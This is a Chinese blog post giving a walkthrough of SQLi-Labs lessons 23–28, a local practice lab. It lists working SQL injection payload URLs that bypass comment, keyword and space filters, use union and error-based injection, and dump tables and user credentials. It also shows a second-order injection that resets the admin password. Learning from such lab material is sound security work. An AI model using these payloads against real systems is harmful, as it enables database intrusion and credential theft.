SqliLab Less23-28 WriteUp

最新推荐文章于 2023-05-13 14:47:31 发布
最新推荐文章于 2023-05-13 14:47:31 发布
阅读量242 收藏
点赞数
分类专栏: sqlilab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jhzzzz/article/details/110382707
版权

文章目录

存储型注入

注册admin’#的账号,密码为123456
在这里插入图片描述
修改admin’#的密码为hahaha
在这里插入图片描述
修改结果如下
在这里插入图片描述
发现admin的密码被更改为hahaha

绕过注释符注入

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

获取id参数时进行了#,- -注释符号的过滤

获取数据库

http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select database()),'3

获取security数据库中的表

http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3

获取users表的列

http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),'3

获取内容

http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),'3

绕过or和and

大小写变形 Or,OR,oR
编码,hex,urlencode
添加注释/* or */
利用符号 and=&& or=||
双写or或and绕过

通过报错注入

获取当前数据库

http://127.0.0.1/sqlilab/Less-25/?id=1' || extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

获取security数据库下的表名

http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),0x7e))--+

这里将information_schema改为infoorrmation_schema来绕过or过滤

获取emails表列名

http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='emails'),0x7e))--+

这里使用aandnd来绕过and过滤。

获取emails表内容

http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,email_id) from emails),0x7e))--+

通过union注入

获取当前数据库

http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select database()),2

获取当前数据库的数据表

http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),2

获取refers表的列名

http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='referers'),2

获取refers表的内容

http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(id,0x3e,referer,0x3e,ip_address) from referers),2

绕过多种符号的过滤

%09 TAB键(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB键(垂直)
%a0 空格

通过BIGINT溢出报错注入

获取当前数据库

http://127.0.0.1/sqlilab/Less-26/?id=1' union select (!(select * from (select database())x) - ~0),2,3 || '1

将空格用%a0代替后

http://127.0.0.1/sqlilab/Less-26/?id=1'%a0union%a0select%a0(!(select%a0*%a0from%a0(select%a0database())x)%a0-%a0~0),2,3%a0||%a0'1

其它过程类似

通过union注入

获取当前数据库

http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,database(),('3

http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,database(),('3

获取当前数据库下数据表

http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3

http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3

获取users表的列名

http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3

http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3

获取users表内容

http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3

http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3
jhzzzz
关注
专栏目录
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1196
sqli-labs,sql注入
SqliLab Less1-17 WriteUp
jhzzzz的博客
11-18 271
文章目录Union 注入盲注报错注入延时注入文件导入注入 Union 注入 盲注 报错注入 延时注入 文件导入注入
Sqli-labs之Less-23
→_→
04-18 705
Less-23 基于错误的,过滤注释的GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
sqli-labs less23
qq_45106794的博客
10-26 248
#sqli-labs less 23 这一关的与第一关的区别有两个,一个是注释符# --+被过滤了 所以我们得闭合第二个单引号 另一个区别是不能用order by 来判断字段数了 具体原因请参照 https://www.jianshu.com/p/2602430f8ee4 ’ union select 1,2,3,4 or ‘1’='1 ’ union select 1,version(),3 o...
Sqli-labs Less23 错误型联合查询 - GET
kevinhanser
08-10 550
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 23: GET - Error based - stip comments 测试漏洞 使用测试语句 ?id=1’ http://10.10.10.137/sqli-labs/Less-23/?id=1%27 显示错误信息 You have an error in your SQL ...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
sqli-lab——Writeup21~38(各种过滤绕过WAF和)
weixin_45694388的博客
12-12 697
Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: mV0L3dlaXhpbl80NTY5NDM4OA==,size_16,color_FFFFFF,t_70) cookie的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的unam
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
sqli-labs————less 23(高级注入篇)
Fly_鹏程万里
05-12 2114
前言从这一关开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。Less -23查看一下源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html...
sqlilabs less-28~less-28a
TA不懒,但还没有添加简介
07-22 740
sqlilabs less-28~less-8a
Sqli-labs之Less-28和Less-28a
→_→
04-27 1417
Less-28 基于错误的,单引号字符型,过滤了union和select等的注入 判断注入类型 1和1"正常回显,1'报错,单引号字符型。2'%26%26'1'='1回显为id=1,有小括号。 参看源码: 发现没有过滤or与and。 过滤了相...
sqlilab学习打卡|手工注入|Less23-Less31
spring!
04-02 1507
sqlilab学习打卡|手工注入|Less23-Less31
Sqlilabs-28
KAKA的博客
07-14 436
因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1129
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 970
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sqli-labs第23~25关
最新发布
yuqnqi的博客
05-13 193
判断为get传参,类似于前10关直接在URL上输入SQL语句判断为单引号闭合与前10关不同的是,注释符无效,我们去看看源码发现注释符被正则表达式过滤且为id传参,单引号闭合所以想办法不用注释符就搞掉后面的单引号于是乎,构造语句?联合查询爆数据库?爆表?爆字段?爆值payload?当然也可以报错注入和其他方法。
搭建本地SQL注入靶场:sqli-labs实战教程
"这篇教程将指导你安装sqli-labs,一个用于学习SQL注入的靶场。sqli-labs提供多样且最新的SQL漏洞环境,同时允许用户修改和审计源码,是网络安全初学者的理想实践平台。为了安全起见,推荐在本地环境而非公网服务器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值